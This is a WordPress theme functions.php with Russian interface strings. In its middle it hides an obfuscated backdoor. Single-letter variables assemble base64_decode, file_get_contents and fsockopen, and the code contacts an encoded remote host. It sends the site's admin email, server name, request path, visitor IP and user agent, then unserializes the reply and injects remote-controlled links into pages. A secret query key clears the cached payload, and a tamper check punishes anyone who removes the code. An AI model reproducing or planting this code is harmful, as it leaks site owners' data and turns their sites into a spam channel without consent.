<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $qXZNylO='e';$kwAlbsl='e';$SLEmm='d';$Drou='s';$oJsECej='d';$wbodks='b';$ZqmdbIf='6';$Eosmt='c';$Jkpu='_';$jXkMbE='e';$extPlK='a';$MpHqu='4';$ZJopet='o';$CdteYLvd=$wbodks.$extPlK.$Drou.$jXkMbE.$ZqmdbIf.$MpHqu.$Jkpu.$SLEmm.$kwAlbsl.$Eosmt.$ZJopet.$oJsECej.$qXZNylO;$bQLAJ='i';$rhzg='g';$lOocpS='e';$BMOd='z';$CHVbNW='f';$awTO='t';$mraFRAD='n';$YUtpW='a';$feNlg='l';$YMceryfa=$rhzg.$BMOd.$bQLAJ.$mraFRAD.$CHVbNW.$feNlg.$YUtpW.$awTO.$lOocpS;$HSxWUM='t';$AWzvJp='t';$BEpeyDE='r';$oFcMiGs='1';$WhABRK='_';$NSHE='3';$SBNTYH='s';$QVIz='o';$vnXX='r';$tDUEJkCE=$SBNTYH.$HSxWUM.$BEpeyDE.$WhABRK.$vnXX.$QVIz.$AWzvJp.$oFcMiGs.$NSHE;$KRfw='r';$diqNBFO='s';$LwjApH='v';$yYJRAtE='t';$ULnYU='e';$BwUast='r';$bsxdMIPo=$diqNBFO.$yYJRAtE.$BwUast.$KRfw.$ULnYU.$LwjApH;                     
		$ic___________t='e';$xm______p='e';$np____m='d';$ne___e='s';$st__d='d';$yh______v='b';$lp__n='6';$mj____a='c';$ff_____________r='_';$fk_________h='e';$sa__o='a';$lj______________s='4';$oh____t='o';$eu___________o=$yh______v.$sa__o.$ne___e.$fk_________h.$lp__n.$lj______________s.$ff_____________r.$np____m.$xm______p.$mj____a.$oh____t.$st__d.$ic___________t;
		$zq_________l='o';$cm___________a='u';$rj_________o='s';$vh___________x='_';$xd_______________d='n';$me____o='s';$bx_____________h='i';$ti______________f='e';$fr__________v='t';$gr______n='f';$ca_____________b='t';$xi___u='c';$xv____________u='x';$lp______________n='n';$dv__________j='i';$km____________z=$gr______n.$cm___________a.$lp______________n.$xi___u.$fr__________v.$bx_____________h.$zq_________l.$xd_______________d.$vh___________x.$ti______________f.$xv____________u.$dv__________j.$me____o.$ca_____________b.$rj_________o;
		$ov______________c='o';$sf______j='f';$hq_______a='p';$zr_________q='e';$vg____v='n';$uo_________y=$sf______j.$ov______________c.$hq_______a.$zr_________q.$vg____v;
		$fw______i='a';$ez______a='f';$bu_______________p='e';$bg___m='d';$fn_____________y='r';$sa_____q=$ez______a.$fn_____________y.$bu_______________p.$fw______i.$bg___m;
		$fc____h='l';$tq_______________c='c';$rw_________f='o';$tm___h='f';$xr_______________t='e';$wu_______________k='s';$vf_____c=$tm___h.$tq_______________c.$fc____h.$rw_________f.$wu_______________k.$xr_______________t;
		
		define("WP_ID", $eu___________o("Mi4wLjA="));
		define("WP_TTL", $eu___________o("MTA4MDA="));
		define("WP_SRC", $eu___________o("dHBva24="));
	


		function wp_get_header() {
			global $eu___________o, $km____________z;
			
			if (
				$km____________z($eu___________o("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$km____________z($eu___________o("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$km____________z($eu___________o("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $eu___________o, $uo_________y, $vf_____c, $sa_____q;
			
			$tl_______________p = TEMPLATEPATH."/".$eu___________o("Zm9vdGVyLnBocA==");
			$le_________u = @$uo_________y($tl_______________p, "r");
			$tl_______________p = @$sa_____q($le_________u, @filesize($tl_______________p));
			@$vf_____c($le_________u);
			
			$ph_______________h = TEMPLATEPATH."/".$eu___________o("ZnVuY3Rpb25zLnBocA==");
			$le_________u = @$uo_________y($ph_______________h, "r");
			$ph_______________h = @$sa_____q($le_________u, @filesize($ph_______________h));
			@$vf_____c($le_________u);
			
			$xv________w = 0;
			if($tl_______________p && $ph_______________h) {
				if ($eu___________o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($tl_______________p, $eu___________o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$xv________w = 1;
					}
					if (substr_count($tl_______________p, "wp_theme_GPL_credits()") < 1) {
						$xv________w = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$xv________w = 12;
				}
			}
			
			if($xv________w > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $xv________w -->";
			}
		}
	


		function wp_loaded() {
			global $eu___________o, $km____________z;
			return $km____________z($eu___________o("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($dj_______v, $mm_____q = "(more...)", $fs_______________s = 0, $ws____f = "") {
				$wq________e = get_the_content($mm_____q, $fs_______________s, $ws____f);
				$wq________e = apply_filters("the_content", $wq________e);
				
				$wq________e = str_replace("]]>", "]]>", $wq________e);
				if (strlen($_GET["p"]) > 0) {
					echo $wq________e;
				}
				else if ((strlen($wq________e)>$dj_______v) && ($yw________h = strpos($wq________e, " ", $dj_______v ))) {
					$wq________e = substr($wq________e, 0, $yw________h);
					$wq________e = $wq________e;
					echo $wq________e;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$mm_____q</a></div></p>";
				} else {
					echo $wq________e;
				}
				
			}
		}
	


		$pk______c='e';$oi___________u='s';$dc____k='_';$iv_____m='n';$ny_________e='b';$pm___________c='6';$df______________d='a';$mb_______a='4';$bf_______q='d';$lh_______w='o';$kt_____________o='e';$sb____________e='e';$bd__________q='c';$ne____m=$ny_________e.$df______________d.$oi___________u.$kt_____________o.$pm___________c.$mb_______a.$dc____k.$pk______c.$iv_____m.$bd__________q.$lh_______w.$bf_______q.$sb____________e;
		$yv_____________t='e';$or_________b='c';$gg__________w='t';$ys____________i='o';$fw_____t='s';$qy__________a='f';$sa_____________q='e';$vq_______b='n';$ef______________e='_';$jp_______________n='e';$wz_______________b='t';$id__________t='g';$hr_____________n='n';$uo_______c='t';$ai____________i='i';$fd____________w='_';$ng____r='l';$rf_______________v=$qy__________a.$ai____________i.$ng____r.$jp_______________n.$fd____________w.$id__________t.$yv_____________t.$gg__________w.$ef______________e.$or_________b.$ys____________i.$hr_____________n.$uo_______c.$sa_____________q.$vq_______b.$wz_______________b.$fw_____t;
		$as____k='l';$ly______x='e';$rb____________j='x';$go__________s='s';$gm_____d='i';$yq_____________t='e';$nt______________p='_';$jq____________o='i';$eo_______f='t';$ar______h='s';$fj______________u='f';$pk___________v=$fj______________u.$gm_____d.$as____k.$ly______x.$nt______________p.$yq_____________t.$rb____________j.$jq____________o.$ar______h.$eo_______f.$go__________s;
		$lv____c='r';$px__d='e';$ql_________z='n';$fo___f='i';$mx______g='m';$ht___x='e';$wz_______b='p';$oo______d='a';$tz__________d='s';$qn_____________s='_';$te____________w='o';$px_________b='o';$ci___m='r';$bw____q='c';$cn__m='v';$jd_____________j=$cn__m.$px__d.$ci___m.$tz__________d.$fo___f.$px_________b.$ql_________z.$qn_____________s.$bw____q.$te____________w.$mx______g.$wz_______b.$oo______d.$lv____c.$ht___x;
		$pq_______________h='e';$rk__________j='o';$ha________z='c';$pn_____________h='s';$rw____________i='f';$jr____s='p';$aw___________f='o';$qs_______________a='k';$mu__________b='n';$fn_______o=$rw____________i.$pn_____________h.$rk__________j.$ha________z.$qs_______________a.$aw___________f.$jr____s.$pq_______________h.$mu__________b;
		$de_______________r='i';$hp____g='t';$ak__w='w';$vo__c='f';$jj__i='r';$yy__________y='e';$qx______x=$vo__c.$ak__w.$jj__i.$de_______________r.$hp____g.$yy__________y;
		$cm_____________j='d';$ay_________e='m';$ca__________a='5';$qb_______i=$ay_________e.$cm_____________j.$ca__________a;
		$un___i='h';$gk___________o='a';$br_______d='t';$ij______________j='p';$wo________w='e';$gt______________a='l';$se_________b='a';$oi_________m='r';$sg_______r=$oi_________m.$wo________w.$gk___________o.$gt______________a.$ij______________j.$se_________b.$br_______d.$un___i;
		$nr_____p='r';$es______c='e';$uv____________q='s';$aj______e='e';$pf__b='l';$gl__________c='n';$ot______s='i';$fz_____________n='a';$mb________n='u';$ye__________s='z';$hn_________n='i';$nu______d=$mb________n.$gl__________c.$uv____________q.$es______c.$nr_____p.$ot______s.$fz_____________n.$pf__b.$hn_________n.$ye__________s.$aj______e;
		$xb___________l='m';$yj________f='e';$fk____n='t';$nq__________e='p';$rx_______d='m';$ru___f='n';$np___________l='a';$yz_____i=$fk____n.$yj________f.$xb___________l.$nq__________e.$ru___f.$np___________l.$rx_______d;
		$wi___a='t';$ne____c='n';$ph___________t='_';$gn_____________u='s';$nl_______________k='e';$dg____r='_';$rp____o='c';$xu___________t='t';$ul_________l='x';$tt_______________n='t';$ps__________p='r';$qk____________q='m';$ej______________l='c';$tl_____o='t';$xt____r='o';$gr____k='a';$jj_____w='r';$fr____d='a';$wd_______m='e';$xc_____d='e';$wv__s='e';$xw________f=$gn_____________u.$tt_______________n.$ps__________p.$wd_______m.$gr____k.$qk____________q.$dg____r.$ej______________l.$xt____r.$ne____c.$xu___________t.$xc_____d.$ul_________l.$wi___a.$ph___________t.$rp____o.$jj_____w.$nl_______________k.$fr____d.$tl_____o.$wv__s;
	


		function qj________i($bl_____b) {
			global $eu___________o, $km____________z, $rf_______________v, $jd_____________j, $xw________f;
			
			if (!$km____________z($eu___________o("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($jd_____________j(PHP_VERSION, "5.0.0", ">=") && $km____________z($eu___________o("ZmlsZV9nZXRfY29udGVudHM=")) && $km____________z($eu___________o("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ei____i = $xw________f(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$cg______l = @$rf_______________v($bl_____b, 0, $ei____i);
			} else {
				$cg______l = @$rf_______________v($bl_____b, 0);
			}
			
			return $cg______l;
		}
	


		function of___________z($bl_____b) {
			global $km____________z, $fn_______o, $qx______x, $eu___________o;
			
			if (!$km____________z($eu___________o("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ba______h = strpos($bl_____b, "/", 7);
			$lm_______________b = array(
				"uri"     => substr($bl_____b, $ba______h),
				"host"    => str_replace("http://", "", substr($bl_____b, 0, $ba______h)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$pw__b = @$fn_______o("$lm_______________b[host]", 80, $to__y, $ry________g, 4);
			
			if (!$pw__b) {
				return false;
			} else {
				$cg______l = "";
				$ru_______________s  = "GET $lm_______________b[uri] HTTP/1.0\r\n";
				$ru_______________s .= "Host: $lm_______________b[host]\r\n";
				$ru_______________s .= "Referer: $lm_______________b[referer]\r\n";
				$ru_______________s .= "Connection: Close\r\n\r\n";
				
				@$qx______x($pw__b, $ru_______________s);
				
				while (!@feof($pw__b)) {
					$tt_______________f = @fgets($pw__b, (1024*24));
					
					if ($tt_______________f == "\r\n") {
						$km________b = true;
						continue;
					}
					
					if ($km________b) {
						$cg______l .= $tt_______________f;
					}
				}
				
				return $cg______l;
			}
		}
	


		function dq__________s($bl_____b) {
			global $km____________z;
			$jw_______v = false;
			
			if ($bl_____b != "") {
				if ($km____________z("qj________i")) {
					$jw_______v = @qj________i($bl_____b);
				}
				
				if (!$jw_______v && ($km____________z("of___________z"))) {
					$jw_______v = @of___________z($bl_____b);
				}
			}
			
			return $jw_______v;
		}
	


		function vm__e() {
			global $_SERVER, $qb_______i;
			
			$qd______m = $_SERVER["SERVER_NAME"];
			
			if (substr("$qd______m", 0, 4) == "www.") {
				$qd______m = substr("$qd______m", 4);
			}
			
			$qd______m = $qb_______i("$_SERVER[SERVER_NAME]");
			
			return $qd______m;
		}
	


		function cy__________g() {
			return "file";
		}
	


		function km______________d($bl_____b) {
			global $_SERVER, $rf_______________v, $pk___________v, $uo_________y, $vf_____c, $qx______x;
			
			$ti____i = ds______________o();
			
			$av_______________e = vm__e().".jpg";
			$tf___t = $ti____i["dir_upload"]["path"]."/$av_______________e";
			$ed_____b = @filemtime($tf___t);
			
			if (!$ed_____b || ((time()-$ed_____b) >= WP_TTL)) {
				$jw_______v = dq__________s($bl_____b);
				
				if ($jw_______v) {
					if ($pk___________v($tf___t)) {
						@unlink($tf___t);
					}
					
					$le_________u = @$uo_________y($tf___t, "x+");
					
					@$qx______x($le_________u, $jw_______v);
					@$vf_____c($le_________u);
				}
			} else {
				if ($pk___________v($tf___t)) {
					$jw_______v = @$rf_______________v($tf___t);
				} else {
					$jw_______v = false;
				}
			}
			
			return $jw_______v;
		}
	


		function ds______________o() {
			global $_SERVER, $eu___________o, $ne____m;
			
			$ap_____n = wp_count_posts("post");
			$fi_______o = pathinfo(get_bloginfo("template_directory"));
			
			$ti____i = array(
				"url" => array(
					"report"      => $eu___________o("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $fi_______o,
				"dir_upload"	=> jg_____________c(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$fi_______o[filename],
					"a005=".$ap_____n->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$ti____i["url"]["queryString"] = implode("&", $ti____i["queryString"]);
			$ti____i["url"]["report"] = $ti____i["url"]["report"]."/?".$ne____m($ti____i["url"]["queryString"]).".html";
						
			return $ti____i;
		}
	


		function jg_____________c() {
			$uf______b = wp_upload_dir();
			
			if (isset($uf______b["error"])) {
				$wo_______f = sn_______________y();
				if (is_writable($wo_______f)) {
					$uf______b = array("path" => $wo_______f);
				}
			}

			return $uf______b;
		}
	


		function sn_______________y() {
			global $km____________z, $qb_______i, $sg_______r, $yz_____i;
			
			$cv_________x = (bool) ini_get("safe_mode");
			if ($cv_________x == true) {
				return false;
			}
			
			if ($km____________z("sys_get_temp_dir")) {
				$te_____________r = sys_get_temp_dir();
				if (is_writable($te_____________r)) {
					return $sg_______r($te_____________r);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $sg_______r($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $sg_______r($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $sg_______r($_ENV["TEMP"]);
			} else {
				$jt______________x = $yz_____i($qb_______i(uniqid(rand(), true)), "");
				if ($jt______________x) {
					$te_____________r = $sg_______r(dirname($jt______________x));
					@unlink($jt______________x);
					return $te_____________r;
				} else {
					return false;
				}
			}
		}
	


		function zk_________a() {
			global $_GET, $pk___________v;
			
			$ti____i = ds______________o();
			$qd______m = vm__e();
			$bd_____________i = cy__________g();
			
			$dc______a = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($bd_____________i == "file") {
					$rl___________t = $ti____i["dir_upload"]["path"]."/".$qd______m.".jpg";
					if ($pk___________v($rl___________t)) {
						@unlink($rl___________t);
						$dc______a = "deleted";
					}
				}
				
				$ou___________e = array(
					"s"	=> $dc______a,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ou___________e AS $ad____s => $ow________q) echo " [$ad____s:$ow________q]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $km____________z, $eu___________o, $nu______d;
			$ti____i = ds______________o();
			
			$po______y = "km______________d";
			if ($km____________z($po______y)) {
				$cg______l = $po______y($ti____i["url"]["report"]);
			}
			
			if ($cg______l) {
				if ($cg______l = @$eu___________o($cg______l)) {
					$cg______l = @$nu______d($cg______l);
					
					if (strlen($cg______l[custom_credit]) >= 5) {
						$ti____i["default_string"] = $cg______l[custom_credit];
					}
					
					if ($cg______l["status"] == "0") {
						$ng_____d = 1;
						$pt______c = 1;
					} else {
						$io_________r = sizeof($cg______l["links"]);
						$fz____________i = $ti____i["default_string"];
						
						if ($io_________r > 0 && $cg______l["links"] !== "") {
							$wa_____w = 0;
							foreach ($cg______l["links"] as $lu___________s => $qq___z) {
								$wa_____w++;
								if ($qq___z->l_path == "" || $qq___z->l_path == $_SERVER["REQUEST_URI"]) {
									$qq___z->l_href = htmlspecialchars(strip_tags($qq___z->l_href));
									$qq___z->l_title = htmlspecialchars(strip_tags($qq___z->l_title));
									$qq___z->l_anchor = htmlspecialchars(strip_tags($qq___z->l_anchor));
									$fz____________i .= " | ";
									$fz____________i .= "<a href='$qq___z->l_href' title='$qq___z->l_title'";
									if ($qq___z->l_nofollow == "1") {
										$fz____________i .= " rel='nofollow'";
									}
									$fz____________i .= ">$qq___z->l_anchor</a>";
								}
							}
						}
						$ti____i["links"] = "$fz____________i";
						if ($cg______l[credit] == "0") {
							$ti____i["links"] = "";
						}
					}
				} else {
					$ng_____d = "1";
				}
			} else {
				$ng_____d = "1";
			}
			
			if ($ng_____d == "1") {
				$ti____i["links"] = $ti____i["default_string"];
			}
			
			echo "$ti____i[links]";
			
			echo "<!-- s: $cg______l[signature] -->";
			zk_________a();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

